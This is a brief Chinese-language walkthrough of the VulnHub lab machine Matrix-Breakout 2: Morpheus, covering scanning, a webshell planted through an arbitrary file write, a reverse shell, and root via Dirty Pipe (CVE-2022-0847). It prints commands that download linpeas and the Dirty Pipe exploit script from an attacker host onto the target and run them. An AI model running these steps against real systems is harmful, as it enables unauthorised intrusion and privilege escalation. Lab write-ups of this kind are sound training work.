靶机下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
下载后拖入VMware打开,然后和kali都设置成nat网络模式,在kali上arp扫出靶机ip然后扫描端口,发现开了80端口,直接去web搜集信息。
并没有有用的信息,robots.txt也没有有用的信息。然后进行目录扫描,一开始用的dirsearch,没扫出有用的东西,又用了gobuster去扫描。字典来自kali机的/usr/share/wordlists/dirbuster目录
扫到一个php文件。
发现存在写任意文件漏洞,用hackbar直接写webshell,然后蚁剑连接。
然后创建py脚本进行shell反弹
并获取一个标准shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
成功拿到靶机shell,但是是低权限。
翻翻文件发现根目录有一个FLAG.txt
图片也下载下来了,然后就不知道怎么弄了,也没搜集到啥信息。那还是继续关注提权吧。这里有一个很厉害的内网扫描脚本 linpeas.sh,可以扫描漏洞等等。
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
直接wget下载到靶机,然后赋权运行
会扫描出漏洞,我们是用DirtyPipe进行提权。可以先下载到kali上
git clone https://github.com/imfiver/CVE-2022-0847.git
然后用靶机进行下载。
wget http://192.168.243.129/CVE-2022-0847/Dirty-Pipe.sh
赋权运行直接就拿到root权限了。